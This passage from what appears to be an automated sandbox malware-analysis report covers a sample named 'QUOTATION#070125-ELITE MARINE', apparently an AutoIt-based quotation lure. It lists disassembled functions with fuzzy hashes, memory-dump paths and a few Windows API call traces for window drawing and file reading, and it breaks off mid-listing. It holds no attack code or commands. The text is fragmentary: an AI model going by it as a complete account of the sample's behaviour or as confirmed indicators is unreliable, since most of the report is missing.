                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b0a993a889964e4605471364d4a924ba357188b323a94d1722766bf8337f953
                                                                            • Instruction ID: 9eae5ee2b6ba687e145a3fa6cea9e115b560b865d15c2880c9da329c2d132c45
                                                                            • Opcode Fuzzy Hash: 2b0a993a889964e4605471364d4a924ba357188b323a94d1722766bf8337f953
                                                                            • Instruction Fuzzy Hash: E002B7B1E00115EBDB05DF54D881AAEB7B6FF48300F1081A9E81A9B391EB71AA15CFD5
                                                                            Function 0065CAA0 Relevance: .5, Instructions: 464COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                            • Instruction ID: 2a5c10fd3d67b67abcc21792425a7625aec9c598bfd205ddd164dd72c7a62caa
                                                                            • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                            • Instruction Fuzzy Hash: 34020D71E002199FDF14CFA9C8806EDBBF2EF48325F25816AD819E7344D731AA45CB94
                                                                            Function 00669EEE Relevance: .3, Instructions: 294COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0acc58effc8c6a64f963a4289d4d638eb0ceff23506042c41f5c2b3babd82c8d
                                                                            • Instruction ID: e4a5cc92f2aeb25f8f5c48066b0d1c444ab8421d8bb74bd6e80f7a4e240ee57c
                                                                            • Opcode Fuzzy Hash: 0acc58effc8c6a64f963a4289d4d638eb0ceff23506042c41f5c2b3babd82c8d
                                                                            • Instruction Fuzzy Hash: 42B1F220D2AF914DC72396398931336B75DAFBB6D5F52E31BFC1674E22EB2285834141
                                                                            Function 00651C77 Relevance: .3, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                            • Instruction ID: b4b97d3ad94721a2d46c30eaaa554e2668f3c102477ed5889079a7ba43a7ea68
                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                            • Instruction Fuzzy Hash: D49177725080A34ADB29463985356BDFFF25E533A3B1A079DDCF2CE2C1EE14895DD620
                                                                            Function 00651F32 Relevance: .2, Instructions: 244COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                            • Instruction ID: dc4f26612c77220b4079d945440d6d8e6c62f79ec80f6e750546735a87f37f38
                                                                            • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                            • Instruction Fuzzy Hash: 0A9154726090A34ADB694239847417EFFE35A933A3B1A079DDCF2CF2C5EE24855CD620
                                                                            Function 006519B0 Relevance: .2, Instructions: 240COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                            • Instruction ID: aebdf2603426cb55d6e97aa0f7bebe88cb11576f94e185e20afce4bcfc84ca92
                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                            • Instruction Fuzzy Hash: 059158726090A34ADB2E427A85741BDFFE25A933A3B1A079DD8F2CE2C1FD14C55DD620
                                                                            Function 00657A4A Relevance: .2, Instructions: 237COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 22f31321085f2d1d5f0504d7194d6183e1b27e4f5230b980a876a7271cee3434
                                                                            • Instruction ID: d5ef151b7162fdea43fe959d4643688ad026d66c4db2b009089b763414817906
                                                                            • Opcode Fuzzy Hash: 22f31321085f2d1d5f0504d7194d6183e1b27e4f5230b980a876a7271cee3434
                                                                            • Instruction Fuzzy Hash: 4061567160870A5BEA349E28BD95BFE239BDF51303F14091DEC42DB381DA11AE4EC319
                                                                            Function 00657CA7 Relevance: .2, Instructions: 237COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ddeb0fa200a1d3638e60433a36ef8467ac530647c7f50d8998cb333256452201
                                                                            • Instruction ID: 503a420fa969d302496b2dc1bb487af6f8ffbc59b354f9838333583088260557
                                                                            • Opcode Fuzzy Hash: ddeb0fa200a1d3638e60433a36ef8467ac530647c7f50d8998cb333256452201
                                                                            • Instruction Fuzzy Hash: 05616C7120870956DF384A28B856BFE23A7DF41703F100B5DED83DB781EA129D4F8255
                                                                            Function 00651706 Relevance: .2, Instructions: 232COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                            • Instruction ID: 1e1664daae0e2f7a0e984136cd22b3668cfd9eac30c9896fc8cd902865f86fdc
                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                            • Instruction Fuzzy Hash: 5E8168725090A30ADB6D423D85345BEFFE35A933A3B1A079DD8F2CE2C1EE14995CD620
                                                                            Function 0064D07D Relevance: .1, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 47a302dc2a14eff8bd4ab067704746d847afafeebdc3610a676d1bbcf591d726
                                                                            • Instruction ID: 309ed1e2638fe42e45edf1b1522a0eba305a25bbbccb1a16a01122b03251cc02
                                                                            • Opcode Fuzzy Hash: 47a302dc2a14eff8bd4ab067704746d847afafeebdc3610a676d1bbcf591d726
                                                                            • Instruction Fuzzy Hash: 4541D4D288EAD09FDB038B306C68968BFA0AD6755878E82DFD0854B097F351410DC766
                                                                            Function 0106D120 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                            • Instruction ID: d6d375c9aa03cba540a2c82e09fd81ce0c568c76bed2d7b874940812b574e64f
                                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                            • Instruction Fuzzy Hash: 8D41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D556AB345D730AB41DB80
                                                                            Function 0106D010 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                            • Instruction ID: 07a2b6183c109fa75e45d6fa231693a35be899cc9d64f8f72de70db4250ff066
                                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                            • Instruction Fuzzy Hash: 1C019278A00109EFDB84DF98C6909AEF7F9FB48350F608599E859A7341D731AE52DB80
                                                                            Function 0106CFB0 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                            • Instruction ID: 6b7e3ca907088e9792dafcf5793e50170473671785119ad8f241cb26d55c4177
                                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                            • Instruction Fuzzy Hash: E5019278A00109EFDB84DF98C6909AEF7F9FF48310F208599E859A7301D730AE41DB80
                                                                            Function 0106B9A0 Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                            Function 006B2ADE Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 006B2B30
                                                                            • DeleteObject.GDI32(00000000), ref: 006B2B43
                                                                            • DestroyWindow.USER32 ref: 006B2B52
                                                                            • GetDesktopWindow.USER32 ref: 006B2B6D
                                                                            • GetWindowRect.USER32(00000000), ref: 006B2B74
                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 006B2CA3
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 006B2CB1
                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2CF8
                                                                            • GetClientRect.USER32(00000000,?), ref: 006B2D04
                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006B2D40
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2D62
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2D75
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2D80
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006B2D89
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2D98
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006B2DA1
                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2DA8
                                                                            • GlobalFree.KERNEL32(00000000), ref: 006B2DB3
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2DC5
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,006CFC38,00000000), ref: 006B2DDB
                                                                            • GlobalFree.KERNEL32(00000000), ref: 006B2DEB
                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 006B2E11
                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 006B2E30
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B2E52
                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006B303F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 2211948467-2373415609
                                                                            • Opcode ID: b78296d226f6c3f44f9d199e6a13ae676ef74f145ac2f728c7a86ec181c922b7
                                                                            • Instruction ID: 072c78e61c9f61140392b7be9d73a54ce29b526ec661cb75f7320987a0f940a2
                                                                            • Opcode Fuzzy Hash: b78296d226f6c3f44f9d199e6a13ae676ef74f145ac2f728c7a86ec181c922b7
                                                                            • Instruction Fuzzy Hash: 61027EB1900215EFDB14DF65CD89EAE7BBAEF48320F049158F919AB2A1CB749D41CB60
                                                                            Function 006C70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetTextColor.GDI32(?,00000000), ref: 006C712F
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 006C7160
                                                                            • GetSysColor.USER32(0000000F), ref: 006C716C
                                                                            • SetBkColor.GDI32(?,000000FF), ref: 006C7186
                                                                            • SelectObject.GDI32(?,?), ref: 006C7195
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 006C71C0
                                                                            • GetSysColor.USER32(00000010), ref: 006C71C8
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 006C71CF
                                                                            • FrameRect.USER32(?,?,00000000), ref: 006C71DE
                                                                            • DeleteObject.GDI32(00000000), ref: 006C71E5
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 006C7230
                                                                            • FillRect.USER32(?,?,?), ref: 006C7262
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C7284
                                                                              • Part of subcall function 006C73E8: GetSysColor.USER32(00000012), ref: 006C7421
                                                                              • Part of subcall function 006C73E8: SetTextColor.GDI32(?,?), ref: 006C7425
                                                                              • Part of subcall function 006C73E8: GetSysColorBrush.USER32(0000000F), ref: 006C743B
                                                                              • Part of subcall function 006C73E8: GetSysColor.USER32(0000000F), ref: 006C7446
                                                                              • Part of subcall function 006C73E8: GetSysColor.USER32(00000011), ref: 006C7463
                                                                              • Part of subcall function 006C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 006C7471
                                                                              • Part of subcall function 006C73E8: SelectObject.GDI32(?,00000000), ref: 006C7482
                                                                              • Part of subcall function 006C73E8: SetBkColor.GDI32(?,00000000), ref: 006C748B
                                                                              • Part of subcall function 006C73E8: SelectObject.GDI32(?,?), ref: 006C7498
                                                                              • Part of subcall function 006C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 006C74B7
                                                                              • Part of subcall function 006C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006C74CE
                                                                              • Part of subcall function 006C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 006C74DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                            • String ID:
                                                                            • API String ID: 4124339563-0
                                                                            • Opcode ID: 515eaf02aba167f51c9895fbb9cf5ce9cecc338a48a62e42840a1067ce55e0d0
                                                                            • Instruction ID: 94847ca6c16af5c8802ca6e6d012ec5cf95e40eaa5e47c1987609be2c829a90a
                                                                            • Opcode Fuzzy Hash: 515eaf02aba167f51c9895fbb9cf5ce9cecc338a48a62e42840a1067ce55e0d0
                                                                            • Instruction Fuzzy Hash: FFA1AC72008301AFDB009F64DC48EBBBBAAFB89330F141A19F966961E1D735E945CF51
                                                                            Function 00648D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?), ref: 00648E14
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00686AC5
                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00686AFE
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00686F43
                                                                              • Part of subcall function 00648F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00648BE8,?,00000000,?,?,?,?,00648BBA,00000000,?), ref: 00648FC5
                                                                            • SendMessageW.USER32(?,00001053), ref: 00686F7F
                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00686F96
                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00686FAC
                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00686FB7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                            • String ID: 0
                                                                            • API String ID: 2760611726-4108050209
                                                                            • Opcode ID: ac1baf230503fe8b54d6a5d9ed16fd59e481de63f695eb109cd3a316c8971cd9
                                                                            • Instruction ID: 60aa024406804eaaa2d94049fb86f15fb410ebbf5dbaa1990e04ce6ce054ad59
                                                                            • Opcode Fuzzy Hash: ac1baf230503fe8b54d6a5d9ed16fd59e481de63f695eb109cd3a316c8971cd9
                                                                            • Instruction Fuzzy Hash: 6C12AC30604241DFDB25EF24C848BAABBE3FF44310F548669F5898B261CB31EC92DB95
                                                                            Function 006B2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000), ref: 006B273E
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006B286A
